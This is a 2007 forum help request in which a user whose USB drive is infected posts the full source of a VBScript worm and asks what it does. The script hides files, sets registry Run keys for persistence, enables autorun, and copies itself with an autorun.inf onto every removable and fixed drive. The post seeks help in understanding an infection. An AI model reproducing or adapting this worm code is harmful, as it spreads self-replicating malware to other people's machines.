By using this site, you agree to our updated Privacy Policy and our Terms of Use. Manage your Cookies Settings.
435,192 Members | 1,276 Online
Bytes IT Community
+ Ask a Question
Need help? Post your question and get tips & solutions from a community of 435,192 IT Pros & Developers. It's quick & easy.

VB Script Help

P: 55
Hello everybody, i a C/C++ programmer but i have a visual basic question becasue my computer is being attacked by someone else.

I don't know what is the function of the code. Could oyu please explain to me. I only know that ifle is hidden and i cannot format or delete from my pendrive.

Below is the code:

Expand|Select|Wrap|Line Numbers
  1. 'mark
  2. 'slow and silent (sas)1.0
  3. on error resume next
  4. dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,cc,hm
  5. atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe .MS32DLL.dll.vbs"
  6. set fs = createobject("Scripting.FileSystemObject")
  7. set mf = fs.getfile(Wscript.ScriptFullname)
  8. set rg = createobject("WScript.Shell")
  9. rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","10"
  10. rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.vbs"
  11. rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe "&winpath&"\boot.ini"
  12. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
  13. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
  14. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
  15. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1"
  16. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
  17. dim text,size
  18. size = mf.size
  19. set text=mf.openastextstream(1,-2)
  20. cc = text.readline
  21. do while not text.atendofstream
  22. mysource=mysource&text.readline
  23. mysource=mysource & vbcrlf
  24. loop
  25. Set winpath = fs.getspecialfolder(0)
  26. set tf = fs.getfile(winpath & "\.MS32DLL.dll.vbs")
  27. tf.attributes = 32
  28. set tf=fs.createtextfile(winpath & "\.MS32DLL.dll.vbs",2,true)
  29. tf.write "'ker"&vbcrlf&mysource
  30. tf.close
  31. set tf = fs.getfile(winpath & "\.MS32DLL.dll.vbs")
  32. tf.attributes = 39
  33. Set winpath = fs.getspecialfolder(0)
  34. set tf = fs.getfile(winpath & "\boot.ini")
  35. tf.attributes = 32
  36. set tf=fs.createtextfile(winpath & "\boot.ini",2,true)
  37. tf.write "'ker"&vbcrlf&mysource
  38. tf.close
  39. set tf = fs.getfile(winpath & "\boot.ini")
  40. tf.attributes = 39
  41. if cc = "'mark" then
  42. rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
  43. end if
  44. if cc = "'marker" then
  45. rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
  46. end if
  47. do
  48. for each flashdrive in fs.drives
  49. hm="'mark"
  50. If (flashdrive.drivetype=1 or flashdrive.drivetype=2) and flashdrive.path <> "A:" then
  51. if(flashdrive.drivetype=2) then
  52. hm = "'marker"
  53. end if
  54. set tf=fs.getfile(flashdrive.path &"\.MS32DLL.dll.vbs")
  55. tf.attributes =32
  56. set tf=fs.createtextfile(flashdrive.path &"\.MS32DLL.dll.vbs",2,true)
  57. tf.write hm&vbcrlf&mysource
  58. tf.close
  59. set tf=fs.getfile(flashdrive.path &"\.MS32DLL.dll.vbs")
  60. tf.attributes =39
  61. set tf =fs.getfile(flashdrive.path &"\autorun.inf")
  62. tf.attributes = 32
  63. set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
  64. tf.write atr
  65. tf.close
  66. set tf =fs.getfile(flashdrive.path &"\autorun.inf")
  67. tf.attributes=39
  68. end if
  69. rg.R
  70. egWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","0"
  71. rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.vbs"
  72. rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe /E:vbs "&winpath&"\boot.ini"
  73. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
  74. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
  75. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
  76. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1"
  77. rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
  78. next
  79. if cc <> "'mark" then
  80. Wscript.sleep 10000
  81. end if
  82. loop while cc <> "'mark"
  83.  
  84.  
Any idea and recommendations is greatly appreciated by me and others.

Thanks for your help.
Apr 11 '07 #1
Share this question for a faster answer!
Share on Google+

Post your reply

Sign in to post your reply or Sign up for a free account.